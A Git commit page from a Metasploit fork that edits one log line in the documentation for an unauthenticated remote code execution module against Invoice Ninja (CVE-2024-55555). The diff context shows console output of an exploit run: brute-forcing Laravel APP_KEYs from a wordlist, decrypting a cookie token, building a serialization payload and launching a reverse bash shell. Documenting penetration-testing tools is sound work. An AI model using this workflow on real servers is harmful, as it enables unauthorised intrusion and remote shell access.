adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

simplified some code sections

Browse Source
This commit is contained in:
h00die-gr3y
2025-02-23 12:59:52 +00:00
parent ece33ee8ec
commit 41e690445e
2 changed files with 12 additions and 18 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555.md
+1 -1
View File
@@ -82,7 +82,7 @@ msf6 exploit(linux/http/invoiceninja_unauth_rce_cve_2024_55555) > rexploit
[*] Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.
[*] Grabbing the cookie with the XSRF-TOKEN.
[*] Starting bruteforce decryption with APP_KEYS listed in /root/laravel-crypto-killer/wordlists/invoiceninja_default.txt.
[+] Valid APP_KEY found: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
[+] APP_KEY is valid: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=
[+] Unciphered value: e60eab8287b88f834312505e582750ae6f95a84b|3epElAO1qNeckBzHOytBrNnGrvRJSyeCBsahBkSO
[*] Generate an encrypted serialization payload with our cracked APP_KEY.
[*] Executing Unix/Linux Command for cmd/unix/reverse_bash